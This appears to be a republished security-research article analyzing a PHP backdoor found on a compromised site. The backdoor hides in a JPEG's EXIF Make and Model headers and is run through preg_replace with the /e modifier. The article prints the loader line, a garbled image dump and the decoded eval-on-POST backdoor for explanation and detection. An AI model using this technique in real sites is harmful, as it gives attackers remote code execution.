Malware Hidden Inside jpg exif Headers

Source: Internet
Author: User

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. this backdoor didn't rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. it also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.Technical DetailsThe backdoor is divided into two parts. the first part is a mix of the exif_read_data function to read the image headers and the preg_replace function to execute the content. this is what we found in the compromised site: $ exif = exif_read_data ('/homepages/clientsitepath/images/stories/food/bun.jpg '); preg_replace ($ exif ['make'], $ exif ['model'], ''); Both functions are harmless by themselves. exif_read_data is commonly used to read images and preg_replace to replace the content of strings. however, preg_replace has a hidden and tricky option where if you pass the "/e" modifier it will execute the content (eval), instead of just searching/replacing. when we look at the bun.jpg file, we find the second part of the backdoor: Ø Oracle ^ @ ^ PJFIF ^ @ ^ A ^ B ^ @ d ^ @ ÿ á^ @ ¡Exif ^ @ II * ^ @ ^ H ^ @ ^ B ^ @ ^ O ^ A ^ B ^ @ ^ F ^ @ & ^ @ ^ P ^ A ^ B ^ @ m ^ @, ^ @/. */e ^ @ eval (base64_decode ("aWYgKGl zc2V0KCRfUE9TVFsie encode = ')); @ brief answer ^ @ ^ QDucky ^ @ ^ A ^ @ ^ D ^ @ <^ @ brief answer ^ @ ^ NAdobe ^ The file starts normally with the common headers, but in the "Make" header it has a strange keyword :"/. */e ". that's the exact modifier used by preg_replace to execute (eval) whatever is passed to it. now things are getting interesting... if we keep looking at the EXIF data, we can see the "eval (base64_decode" hidden inside the "Model" header. when you put it all together, we can see what is going on. the attackers are reading both the Maker and Model header from the EXIF and filling the preg_replace with them. once we modify the $ exif ['make'] and $ exif ['model'] for what is in the file, we get the final backdoor: preg_replace ("/. */e "," @ eval (base64_decode ("aWYgKGl... "); Once decoded, we can see that it just executes whatever content is provided by the POST variable zz1. The full decoded backdoor is here: if (isset ($ _ POST ["zz1"]) {eval (stripslashes ($ _ POST ["zz1"] ..Steganography MalwareAnother interesting point is that bun.jpg and other images that were compromised, still load and work properly. in fact, on these compromised sites, the attackers modified a legit, pre-existent image from the site. this is a curious steganographic way to hide the malware. note: Any of Sucuri clients using Server Side Scanning are protected against this type of injection (detected by us ).

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.